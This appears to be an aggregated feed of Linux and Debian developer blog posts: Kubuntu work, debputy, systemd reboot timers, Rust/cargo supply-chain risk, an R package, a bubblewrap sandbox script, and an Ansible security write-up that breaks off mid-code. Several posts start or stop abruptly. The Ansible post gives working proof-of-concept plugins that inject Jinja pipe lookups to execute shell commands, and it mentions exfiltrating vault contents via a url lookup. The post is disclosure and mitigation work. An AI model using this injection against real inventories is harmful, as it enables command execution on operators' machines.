Work report

Kubuntu: Bug bashing! I am triaging all the bugs for Plasma, which can be seen here: https://bugs.launchpad.net/plasma-5.27/+bug/2053125

I am happy to report many of the remaining bugs have been fixed in the latest bug-fix release, 5.27.11. I prepared https://kde.org/announcements/plasma/5/5.27.11/ and Rik uploaded it to the archive, thank you. Unfortunately, this and several other key fixes are stuck in transition due to the time_t64 transition, which you can read about here: https://wiki.debian.org/ReleaseGoals/64bit-time . It is the biggest transition in Debian/Ubuntu history and it couldn't have come at a worse time.

We are aware our ISO installer is currently broken; calamares is one of the things stuck in this transition. There is a workaround in the comments of the bug report: https://bugs.launchpad.net/ubuntu/+source/calamares/+bug/2054795

Fixed an issue with plasma-welcome. Found the fix for emojis, and Aaron has kindly moved this forward with the fontconfig maintainer. Thanks!

I have received an https://kfocus.org/spec/spec-ir14.html laptop and it is truly a great machine, now my daily driver. A big thank you to the Kfocus team! I can't wait to show it off at https://linuxfestnorthwest.org/.

KDE Snaps: You will see the activity in this ramp back up as the KDE neon Core project is finally a go! I will participate in the project with part-time status and get everyone on the Enokia team up to speed with my snap knowledge, help prepare the qt6/kf6 transition, package Plasma, and most importantly focus on documentation for future contributors. I have created the (now split) qt6 with KDE patchset support and KDE Frameworks 6 SDK and runtime snaps. I have made the kde-neon-6 extension and the PR is in: https://github.com/canonical/snapcraft/pull/4698 . Future work on the extension will include multiple version-track support and core24 support. I have successfully created our first qt6/kf6 snap: ark.
They will show up in the store once all the required bits have been merged and published. Thank you for stopping by. ~Scarlett
Most of the effort has been spent on the Deb822-based files such as debian/control, which comes with diagnostics, quickfixes, spellchecking (but only for relevant fields!), and completion suggestions. Since not everyone has an LSP-capable editor, and because sometimes you just want diagnostics without having to open each file in an editor, there is also a batch version of the diagnostics via debputy lint. Please see debputy(1) for how debputy lint compares with lintian if you are curious about which tool to use at what time. To help you get started, there is now a debputy lsp editor-config command that can provide you with the relevant editor config glue. At the moment, emacs (via eglot) and vim with vim-youcompleteme are supported. For those that followed the previous blog posts on writing the language server, I would like to point out that the command line for running the language server has changed to debputy lsp server, and you no longer have to tell it which file format to serve. I have decided to make the language server a "polyglot" server for now, which I will hopefully not regret... Time will tell. :) Anyhow, to get started, you will want:
- debian/control
- debian/copyright (the machine readable variant)
- debian/changelog (mostly just spelling)
- debian/rules
- debian/debputy.manifest (syntax checks only; use debputy check-manifest for the full validation for now)
$ apt satisfy 'dh-debputy (>= 0.1.21~), python3-pygls'
# Optionally, for spellchecking
$ apt install python3-hunspell hunspell-en-us
# For emacs integration
$ apt install elpa-dpkg-dev-el markdown-mode-el
# For vim integration via vim-youcompleteme
$ apt install vim-youcompleteme
The installations feature of the manifest will be disabled in this integration mode to avoid feature interactions with debhelper tools that expect debian/<pkg> to contain the materialized package. On a related note, the debputy migrate-from-dh command now supports a --migration-target option, so you can choose the desired level of integration without doing code changes. The command will attempt to auto-detect the desired integration from existing package features such as a build-dependency on a relevant dh sequence, so you do not have to remember this new option every time once the migration has started. :)
- dh_fixperms
- dh_gencontrol
- dh_md5sums
- dh_builddeb
In addition to the problem of state, installing regular updates periodically requires a reboot, even if the rest of the process is automated through a tool like unattended-upgrades. For my personal homelab, I manage a handful of different machines running various services. I used to just schedule a day to update and reboot all of them, but that got very tedious very quickly. I then moved the reboot to a cronjob, and then recently to a systemd timer and service. I figure that laying out my path to better management of this might help others, and will almost certainly lead to someone telling me a better way to do this.

UPDATE: Turns out there's another option for better systemd cron integration. See systemd-cron below.

You: uptime
Me: Every machine gets rebooted at 1AM to clear the slate for maintenance, and at 3:30AM to push through any pending updates. @SwiftOnSecurity, December 27, 2020

Ultimately, uptime only measures the duration since you last proved you can turn the machine on and have it boot. @SwiftOnSecurity, May 7, 2016
Adding a single line to /var/spool/cron/crontabs/root1 is enough to get your machine to reboot once a month2 on the 6th at 8:00 AM3:

0 8 6 * * reboot
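To see concretely when that line fires, here is a toy matcher for the five classic cron fields (illustrative only; real cron also supports ranges, lists, steps, and names):

```python
from datetime import datetime

def cron_matches(spec: str, dt: datetime) -> bool:
    """Toy matcher: supports only plain numbers and '*' in the five fields."""
    minute, hour, dom, month, dow = spec.split()[:5]
    fields = [(minute, dt.minute), (hour, dt.hour), (dom, dt.day),
              (month, dt.month), (dow, dt.isoweekday() % 7)]  # cron: 0 = Sunday
    return all(f == "*" or int(f) == actual for f, actual in fields)

line = "0 8 6 * * reboot"
print(cron_matches(line, datetime(2024, 4, 6, 8, 0)))  # True: the 6th at 08:00
print(cron_matches(line, datetime(2024, 4, 7, 8, 0)))  # False: wrong day
```

The command portion (`reboot`) is simply ignored by the matcher, which only looks at the first five fields.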
To replace the cronjob, I created a regular-reboot.timer with the following contents:

[Unit]
Description=Reboot on a Regular Basis

[Timer]
Unit=regular-reboot.service
OnBootSec=1month

[Install]
WantedBy=timers.target

This triggers the regular-reboot.service systemd unit when the system reaches one month of uptime.
I've seen some guides to creating timer units recommend adding a Wants=regular-reboot.service line to the [Unit] section, but this has the consequence of running that service every time it starts the timer. In this case that will just reboot your system on startup, which is not what you want.
Care needs to be taken to use the OnBootSec directive instead of OnCalendar or any of the other time specifications, as your system could reboot, discover it's still within the expected window, and reboot again. With OnBootSec your system will not have that problem. Technically, this same problem could have occurred with the cronjob approach, but in practice it never did, as the systems took long enough to come back up that they were no longer within the expected window for the job.
I then added the regular-reboot.service:

[Unit]
Description=Reboot on a Regular Basis
Wants=regular-reboot.timer

[Service]
Type=oneshot
ExecStart=shutdown -r 02:45

Scheduling the shutdown for a fixed time of day (02:45 here) staggers the actual reboot beyond the timer's OnBootSec trigger.
This way different systems have different reboot times, so that everything doesn't just reboot and fail all at once. Were something to fail to come back up, I would have some time to fix it, as each machine has a few hours between scheduled reboots.
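As an aside, a sketch of an alternative (untested here): systemd timers can also stagger their triggers natively via the RandomizedDelaySec= option, instead of encoding a per-machine offset in the shutdown time:

```ini
[Timer]
Unit=regular-reboot.service
OnBootSec=1month
# Add a random extra delay of up to 4 hours each time the timer elapses,
# so a fleet of machines does not all reboot at the same moment
RandomizedDelaySec=4h
```

Pairing it with FixedRandomDelay=true makes the chosen delay stable per machine, which is closer to the fixed-offset behaviour described above.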
Once you have both files in place, you'll simply need to reload configuration and then enable and start the timer unit:

systemctl daemon-reload
systemctl enable --now regular-reboot.timer
# systemctl status regular-reboot.timer
regular-reboot.timer - Reboot on a Regular Basis
Loaded: loaded (/etc/systemd/system/regular-reboot.timer; enabled; preset: enabled)
Active: active (waiting) since Wed 2024-03-13 01:54:52 EDT; 1 week 4 days ago
Trigger: Fri 2024-04-12 12:24:42 EDT; 2 weeks 4 days left
Triggers: regular-reboot.service
Mar 13 01:54:52 dorfl systemd[1]: Started regular-reboot.timer - Reboot on a Regular Basis.
These units also show up in monitoring via prometheus-node-exporter. There are plenty of ways to hack in cron support to the node exporter, but just moving to systemd units provides support for both failure tracking and logging, both of which make system administration much easier when things inevitably go wrong.
systemd-cron

An alternative to converting everything by hand, if you happen to have a lot of cronjobs, is systemd-cron. It will turn each crontab and /etc/cron.* directory into automatic service and timer units. Thanks to Alexandre Detiste for letting me know about this project. I have few enough cron jobs that I've already converted, but for anyone looking at a large number of jobs to convert, you'll want to check it out!
prometheus-alertmanager rules:

- alert: UptimeTooHigh
  expr: (time() - node_boot_time_seconds{job="node"}) / 86400 > 35
  annotations:
    summary: "Instance Has Been Up Too Long!"
    description: "Instance Has Been Up Too Long!"
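The PromQL expression above is plain arithmetic on two Unix timestamps; a small Python sketch of the same check, with hypothetical values not tied to any real exporter:

```python
import time

def uptime_too_high(boot_time_seconds: float, now: float, max_days: float = 35) -> bool:
    """Mirror of the alert expression:
    (time() - node_boot_time_seconds) / 86400 > 35"""
    uptime_days = (now - boot_time_seconds) / 86400
    return uptime_days > max_days

now = time.time()
print(uptime_too_high(now - 36 * 86400, now))  # True: up for 36 days, alert fires
print(uptime_too_high(now - 10 * 86400, now))  # False: rebooted recently
```

The 35-day threshold leaves a few days of slack over the monthly reboot before the alert fires.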
Alternatively, add an entry to /etc/crontab or drop a script into /etc/cron.monthly, depending on your system.
Version 261. This version includes the following changes:
[ Chris Lamb ]
* Don't crash if we encounter an .rdb file without an equivalent .rdx file.
(Closes: #1066991)
* In addition, don't identify Redis database dumps (etc.) as GNU R database
files based simply on their filename. (Re: #1066991)
* Update copyright years.
tl;dr: Don't just apt install rustc cargo. Either do that and make sure to use only Rust libraries from your distro (with the tiresome config runes below); or, just use rustup.

If you just apt install rustc cargo, you will end up using Debian's compiler but upstream libraries, directly and uncurated from crates.io. This is not what you want. There are about two reasonable things to do, depending on your preferences.
Q. Download and run whatever code from the internet?

The key question is this: Are you comfortable downloading code, directly from hundreds of upstream Rust package maintainers, and running it?

That's what cargo does. It's one of the main things it's for. Debian's cargo behaves, in this respect, just like upstream's. Let me say that again:

Debian's cargo promiscuously downloads code from crates.io just like upstream cargo.

So if you use Debian's cargo in the most obvious way, you are still downloading and running all those random libraries. The only thing you're avoiding downloading is the Rust compiler itself, which is precisely the part that is most carefully maintained, and of least concern.

Debian's cargo can even download from crates.io when you're building official Debian source packages written in Rust: if you run dpkg-buildpackage, the downloading is suppressed; but a plain cargo build will try to obtain and use dependencies from the upstream ecosystem. (Happily, if you do this, it's quite likely to bail out early due to version mismatches, before actually downloading anything.)
Option 1: WTF, no I don't want curl|bash

OK, but then you must limit yourself to libraries available within Debian. Each Debian release provides a curated set. It may or may not be sufficient for your needs. Many capable programs can be written using the packages in Debian. But any upstream Rust project that you encounter is likely to be a pain to get working, unless their maintainers specifically intend to support this. (This is fairly rare, and the Rust tooling doesn't make it easy.)
To go with this plan, apt install rustc cargo and put this in your configuration, in $HOME/.cargo/config.toml:

[source.debian-packages]
directory = "/usr/share/cargo/registry"

[source.crates-io]
replace-with = "debian-packages"

This causes cargo to look in /usr/share for dependencies, rather than downloading them from crates.io. You must then install the librust-FOO-dev packages for each of your dependencies, with apt. This will allow you to write your own program in Rust, and build it using cargo build.
Option 2: Biting the curl|bash bullet

If you want to build software that isn't specifically targeted at Debian's Rust, you will probably need to use packages from crates.io, not from Debian. If you're going to do that, there is little point not using rustup to get the latest compiler. rustup's install rune is alarming, but cargo will be doing exactly the same kind of thing, only worse (because it trusts many more people) and more hidden. So in this case: do run the curl|bash install rune.

Hopefully the Rust project you are trying to build has shipped a Cargo.lock; that contains hashes of all the dependencies that they last used and tested. If you run cargo build --locked, cargo will only use those versions, which are hopefully OK.

And you can run cargo audit to see if there are any reported vulnerabilities or problems. But you'll have to bootstrap this with cargo install --locked cargo-audit; cargo-audit is from the RUSTSEC folks who do care about these kinds of things, so hopefully running their code (and their dependencies) is fine. Note the --locked, which is needed because cargo's default behaviour is wrong.
Privilege separation

This approach is rather alarming. For my personal use, I wrote a privsep tool which allows me to run all this upstream Rust code as a separate user. That tool is nailing-cargo. It's not particularly well productised, or tested, but it does work for at least one person besides me. You may wish to try it out, or consider alternative arrangements. Bug reports and patches welcome.

OMG what a mess

Indeed. There are a large number of technical and social factors at play. cargo itself is deeply troubling, both in principle, and in detail. I often find myself severely disappointed with its maintainers' decisions. In mitigation, much of the wider Rust upstream community does take this kind of thing very seriously, and often makes good choices. RUSTSEC is one of the results.

Debian's technical arrangements for Rust packaging are quite dysfunctional, too: IMO the scheme is based on fundamentally wrong design principles. But the Debian Rust packaging team is dynamic, constantly working the update treadmills; and the team is generally welcoming and helpful. Sadly, last time I explored the possibility, the Debian Rust Team didn't have the appetite for more fundamental changes to the workflow (including, for example, changes to dependency version handling). Significant improvements to upstream cargo's approach seem unlikely, too; we can only hope that eventually someone might manage to supplant it.
edited 2024-03-21 21:49 to add a cut tag

incoming() (now along with an alias ciw()) summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with the (still draft) wrapper ciw.r that will be part of the next littler release.
For example, when I do this right now as I type this, I see
(typically less than one second later)
edd@rob:~$ ciw.r
Folder Name Time Size Age
<char> <char> <POSc> <char> <difftime>
1: pretest instantiate_0.2.2.tar.gz 2024-03-20 13:29:00 17K 0.07 hours
2: recheck tinytable_0.2.0.tar.gz 2024-03-20 12:50:00 565K 0.72 hours
3: pending Matrix_1.7-0.tar.gz 2024-03-20 12:05:00 2.3M 1.47 hours
4: recheck survey_4.4-2.tar.gz 2024-03-20 02:02:00 2.2M 11.52 hours
5: waiting equateIRT_2.4.0.tar.gz 2024-03-19 17:00:00 895K 20.55 hours
6: pending ravetools_0.1.5.tar.gz 2024-03-19 12:06:00 1.0M 25.45 hours
7: waiting glmmTMB_1.1.9.tar.gz 2024-03-18 16:04:00 4.2M 45.48 hours
edd@rob:~$
See ciw.r --help or ciw.r --usage for more. Alternatively, in your R session, you can call ciw::incoming() (or now ciw::ciw()) for the same result (and/or load the package first).
This release adds some packaging touches, brings the new alias ciw() as well as a state variable with all (known) folder names, and some internal improvements for dealing with error conditions. The NEWS entry follows. Courtesy of my CRANberries, there is also a diffstat report for this release. If you like this or other open-source work I do, you can sponsor me at GitHub.

Changes in version 0.0.2 (2024-03-20)

- The package README and DESCRIPTION have been expanded
- An alias ciw can now be used for incoming
- Network error handling is now more robust
- A state variable known_folders lists all CRAN folders below incoming

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.
remote: fatal: pack exceeds maximum allowed size (4.88 GiB)
However, breaking up the commit into smaller commits for parts of the archive made it possible to push the entire archive. Here are the commands to create this repository:
git init
git lfs install
git lfs track 'dists/**' 'pool/**'
git add .gitattributes
git commit -m"Add Git-LFS track attributes." .gitattributes
time debmirror --method=rsync --host ftp.se.debian.org --root :debian --arch=amd64 --source --dist=bookworm,bookworm-updates --section=main --verbose --diff=none --keyring /usr/share/keyrings/debian-archive-keyring.gpg --ignore .git .
git add dists project
git commit -m"Add." -a
git remote add origin git@gitlab.com:debdistutils/archives/debian/mirror.git
git push --set-upstream origin --all
for d in pool/*/*; do
echo $d;
time git add $d;
git commit -m"Add $d." -a
git push
done
The resulting repository size is around 27MB with Git LFS object storage around 174GB. I think this approach would scale to handle all architectures for one release, but working with a single git repository for all releases for all architectures may lead to a too large git repository (>1GB). So maybe one repository per release? These repositories could also be split up on a subset of pool/ files, or there could be one repository per release per architecture or sources.
Finally, I have concerns about using SHA1 for identifying objects. It seems both Git and Debian's snapshot service are currently using SHA1. For Git there is the SHA-256 transition, and it seems GitLab is working on support for SHA256-based repositories. For serious long-term deployment of these concepts, it would be nice to go for SHA256 identifiers directly. Git-LFS already uses SHA256, but Git internally uses SHA1, as does the Debian snapshot service.
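To make the SHA1/SHA256 distinction concrete: a Git object id is just a hash over a short header plus the contents, and the SHA-256 object format swaps only the hash function. A Python sketch:

```python
import hashlib

def git_object_id(data: bytes, algo: str = "sha1") -> str:
    """Compute a Git blob id: hash of a 'blob <size>\\0' header plus contents."""
    header = b"blob %d\x00" % len(data)
    return hashlib.new(algo, header + data).hexdigest()

content = b"hello\n"
print(git_object_id(content))            # 40-hex id, matches `git hash-object`
print(git_object_id(content, "sha256"))  # 64-hex id under the SHA-256 format
```

Since the two formats produce incompatible ids for identical content, a repository has to commit to one or carry a translation table, which is part of why the transition is slow.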
What do you think? Happy Hacking!
incoming() summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with the (still draft) wrapper ciw.r that will be part of the next littler release.
For example, when I do this right now as I type this, I see
edd@rob:~$ ciw.r
Folder Name Time Size Age
<char> <char> <POSc> <char> <difftime>
1: waiting maximin_1.0-5.tar.gz 2024-03-13 22:22:00 20K 2.48 hours
2: inspect GofCens_0.97.tar.gz 2024-03-13 21:12:00 29K 3.65 hours
3: inspect verbalisr_0.5.2.tar.gz 2024-03-13 20:09:00 79K 4.70 hours
4: waiting rnames_1.0.1.tar.gz 2024-03-12 15:04:00 2.7K 33.78 hours
5: waiting PCMBase_1.2.14.tar.gz 2024-03-10 12:32:00 406K 84.32 hours
6: pending MPCR_1.1.tar.gz 2024-02-22 11:07:00 903K 493.73 hours
edd@rob:~$
Good enough for me. From a well-connected EC2 instance it is about 800ms on the command-line. When I do it from here inside an R session it is maybe 700ms. And doing it over in Europe is faster still.
(I am using ping=FALSE for these to omit the default sanity check of "can I haz networking?" to speed things up. The check adds another 200ms or so.)
The function (and the wrapper) offer a ton of options too; this is ridiculously easy to do thanks to the docopt package:
edd@rob:~$ ciw.r -x
Usage: ciw.r [-h] [-x] [-a] [-m] [-i] [-t] [-p] [-w] [-r] [-s] [-n] [-u] [-l rows] [-z] [ARG...]
-m --mega use 'mega' mode of all folders (see --usage)
-i --inspect visit 'inspect' folder
-t --pretest visit 'pretest' folder
-p --pending visit 'pending' folder
-w --waiting visit 'waiting' folder
-r --recheck visit 'waiting' folder
-a --archive visit 'archive' folder
-n --newbies visit 'newbies' folder
-u --publish visit 'publish' folder
-s --skipsort skip sorting of aggregate results by age
-l --lines rows print top 'rows' of the result object [default: 50]
-z --ping run the connectivity check first
-h --help show this help text
-x --usage show help and short example usage
where ARG... can be one or more file name, or directories or package names.
Examples:
ciw.r -ip # run in 'inspect' and 'pending' mode
ciw.r -a # run with mode 'auto' resolved in incoming()
ciw.r # run with defaults, same as '-itpwr'
When no argument is given, 'auto' is selected which corresponds to 'inspect', 'waiting',
'pending', 'pretest', and 'recheck'. Selecting '-m' or '--mega' are select as default.
Folder selecting arguments are cumulative; but 'mega' is a single selections of all folders
(i.e. 'inspect', 'waiting', 'pending', 'pretest', 'recheck', 'archive', 'newbies', 'publish').
ciw.r is part of littler which brings 'r' to the command-line.
See https://dirk.eddelbuettel.com/code/littler.html for more information.
edd@rob:~$
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.
debootstrap is mostly converted, and the patches for glibc and base-files have been refined due to feedback from the upload to Ubuntu noble. Beyond this, he sent patches for all remaining packages that cannot move their files with dh-sequence-movetousr, and for packages using dpkg-divert in ways that dumat would not recognize.
The preliminary work used the unshare chroot mode. However, after discussion with josch, jochensp and helmut (thanks to them!), it turns out that the unshare mode is not the most suitable for the pipeline, since the level of isolation it provides is not needed, and some test suites would fail (e.g. krb5). Additionally, one of the requirements of the build job is the use of ccache, since it is needed by some large C/C++ projects to reduce the compilation time. In the preliminary work with unshare last month, it was not possible to make ccache work.
Finally, Santiago changed the chroot mode, and now has a couple of POCs (cf. 1 and 2) that rely on schroot and sudo, respectively. And the good news is that ccache is successfully used by sbuild with schroot!
The image here comes from an example of building grep. At the end of the build, ccache -s shows the statistics of the cache that was used, and so a little more than half of the calls of that job were cacheable. The most important pieces are in place to finish the integration of sbuild into the pipeline.
Other than that, Santiago also reviewed the very useful merge request !346, made by IOhannes zmölnig, to autodetect the release from debian/changelog. As agreed with IOhannes, Santiago is preparing a merge request to include the release autodetection use case in Salsa CI's own CI.
| Phone | RAM | External Display | Price |
|---|---|---|---|
| Edge 20 Pro [5] | 6-12G | HDMI | $500 (not many on sale) |
| Edge S aka moto G100 [6] | 6-8G | HDMI | $500 to $600+ |
| Fairphone 4 | 6-8G | USBC-DP | $1000+ |
| Nubia Red Magic 5G | 8-16G | USBC-DP | $600+ |
| Phone | RAM | Price | Issues |
|---|---|---|---|
| Note 9 128G/512G | 6G/8G | <$300 | Not supporting external display |
| Galaxy S9+ | 6G | <$300 | Not supporting external display |
| Xperia 5 | 6G | >$300 | Hotspot partly working |
| OnePlus 3T | 6G | $200-$400+ | Photos not working |
Every time I run cabal install, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy. In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.
I can do the operations that need my secrets (git push, git pull from private repositories, gh pr create) from the "outside", and the actual build environment can do without access to these secrets. The user experience I thus want is a quick way to enter a development environment where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual /home directory.
I initially followed the blog post Application Isolation using NixOS Containers by Marcin Sucharski and got something working that mostly did what I wanted, but then a colleague pointed out that tools like firejail can achieve roughly the same with a less global setup. I tried to use firejail, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower-level sandboxing tool https://github.com/containers/bubblewrap.
The script, called dev and included below, builds a new filesystem namespace with minimal /proc and /dev directories, and its own /tmp directory. It then bind-mounts some directories to make the host's NixOS system available inside the container (/bin, /usr, the nix store including the daemon socket, stuff for OpenGL applications). My user's home directory is taken from ~/.dev-home and some configuration files are bind-mounted for convenient sharing. I intentionally don't share most of the configuration; for example, a direnv enable in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding .Xauthority file are made available. And finally, if I run dev in a project directory, this project directory is bind-mounted writable, and the current working directory is preserved.
The effect is that I can type dev on the command line to enter dev mode rather conveniently. I can run development tools, including graphical ones like VSCode, and especially the latter with its extensions is part of the sandbox. To do a git push I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection.

Clearly, this isn't going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and the nix daemon socket can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in $HOME.
(I could not get xdg-desktop-portal to heed my default browser settings.) For now I will live with manually copying and pasting URLs; we'll see how long this lasts.

It might also be worth running evolution or firefox inside the container, and not even having VSCode or cabal available outside, so that it's less likely that I forget to enter dev before using these tools.

It shouldn't be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to bubblewrap here. Or maybe I'll get tired of dev and go back to what I did before.

The dev script (at the time of writing):
#!/usr/bin/env bash
extra=()
if [[ "$PWD" == /home/jojo/build/* ]] || [[ "$PWD" == /home/jojo/projekte/programming/* ]]
then
extra+=(--bind "$PWD" "$PWD" --chdir "$PWD")
fi
if [ -n "$1" ]
then
cmd=( "$@" )
else
cmd=( bash )
fi
# Caveats:
# * access to all of /etc
# * access to /nix/var/nix/daemon-socket/socket , and is trusted user (but needed to run nix)
# * access to X11
exec bwrap \
--unshare-all \
\
# blank slate \
--share-net \
--proc /proc \
--dev /dev \
--tmpfs /tmp \
--tmpfs /run/user/1000 \
\
# Needed for GLX applications, in particular alacritty \
--dev-bind /dev/dri /dev/dri \
--ro-bind /sys/dev/char /sys/dev/char \
--ro-bind /sys/devices/pci0000:00 /sys/devices/pci0000:00 \
--ro-bind /run/opengl-driver /run/opengl-driver \
\
--ro-bind /bin /bin \
--ro-bind /usr /usr \
--ro-bind /run/current-system /run/current-system \
--ro-bind /nix /nix \
--ro-bind /etc /etc \
--ro-bind /run/systemd/resolve/stub-resolv.conf /run/systemd/resolve/stub-resolv.conf \
\
--bind ~/.dev-home /home/jojo \
--ro-bind ~/.config/alacritty ~/.config/alacritty \
--ro-bind ~/.config/nvim ~/.config/nvim \
--ro-bind ~/.local/share/nvim ~/.local/share/nvim \
--ro-bind ~/.bin ~/.bin \
\
--bind /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 \
--bind ~/.Xauthority ~/.Xauthority \
--setenv DISPLAY :0 \
\
--setenv container dev \
"${extra[@]}" \
-- \
"${cmd[@]}"
If an inventory variable contains a Jinja expression with a pipe lookup, it might get executed in your shell.
Let that sink in for a moment, and then we'll look at an example.
Let that sink in for a moment, and then we'll look at an example.
Example inventory plugin
from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked") }}')
This plugin:

- is named evgeni.inventoryrce.inventory
- only accepts inventory files whose name ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
- adds a host exploit.example.com with local connection type and a something_funny variable to the inventory

We place it in ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).
And we create a configuration file.
As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.
If we now call ansible-inventory, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
{
    "_meta": {
        "hostvars": {
            "exploit.example.com": {
                "ansible_connection": "local",
                "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\") }}"
            }
        }
    },
    "all": {
        "children": ["ungrouped"]
    },
    "ungrouped": {
        "hosts": ["exploit.example.com"]
    }
}
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)
So far, nothing dangerous has happened.
The inventory got generated, the host is present, the funny variable is set, but it's still only a string.
Executing a playbook, interpreting Jinja
To execute the code we'd need to use the variable in a context where Jinja is used.
This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.
Or a debug
task where you dump all variables of a host to analyze what's set.
Let's use that!
- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]
This playbook just does a debug. No mention of our funny variable. Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml

PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]

TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] => {
    "hostvars[inventory_hostname]": {
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
        "something_funny": ""
    }
}

PLAY RECAP *************************************************************************************************
exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
Wait, something_funny is an empty string? Jinja got executed: the expression was {{ lookup("pipe", "touch /tmp/hacked") }}, and touch does not return anything. But it did create the file!
% ls -alh /tmp/hacked -rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
And the pipe lookup is only one example of what can happen once the lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/etc.
Why is this possible?
This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe, and Ansible processes everything with Jinja in it. In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:
from ansible.utils.unsafe_proxy import wrap_var

self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked") }}'))
With that, debug prints the literal string instead of executing it:

"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\") }}"
for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)
for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)
for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
set_variable
doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".
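Until it does, a plugin author can at least screen incoming values for template syntax before handing them to set_variable. The following is a purely illustrative heuristic in plain Python (not an Ansible API): it only flags values that would be templated if stored without wrap_var.

```python
import re

# Jinja delimiters for expressions ({{ }}), statements ({% %}) and
# comments ({# #}). Matching any of them in an inventory value is
# suspicious: legitimate IPs, hostnames and labels never contain them.
JINJA_MARKERS = re.compile(r"{{|{%|{#")


def looks_like_jinja(value):
    """Return True if a string value contains Jinja template delimiters."""
    return isinstance(value, str) and bool(JINJA_MARKERS.search(value))
```

A plugin could log a warning or refuse such values outright; wrapping everything with wrap_var remains the more robust fix, since this heuristic only catches the obvious delimiter forms.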
Can something similar happen in other parts of Ansible?
It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481.
But even if we only look at inventories, add_host(host)
can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host") }}')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml

PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host") }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}

PLAY RECAP ************************************************************************************************
lol{{ lookup("pipe", "touch /tmp/hacked-host") }} : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0

% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
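One defensive option (my suggestion, not an upstream Ansible fix) is to validate host names before they ever reach add_host, rejecting anything outside plain hostname characters. A sketch, with a tiny stand-in inventory object so the guard itself is self-contained; in a real plugin you would call this with self.inventory instead:

```python
import re

# Plain hostname characters only (letters, digits, dots, hyphens,
# underscores). Spaces, braces and quotes -- everything an injected
# Jinja expression needs -- are refused up front.
VALID_HOSTNAME = re.compile(r"^[A-Za-z0-9._-]+$")


def safe_add_host(inventory, name):
    """Validate a host name before passing it to inventory.add_host()."""
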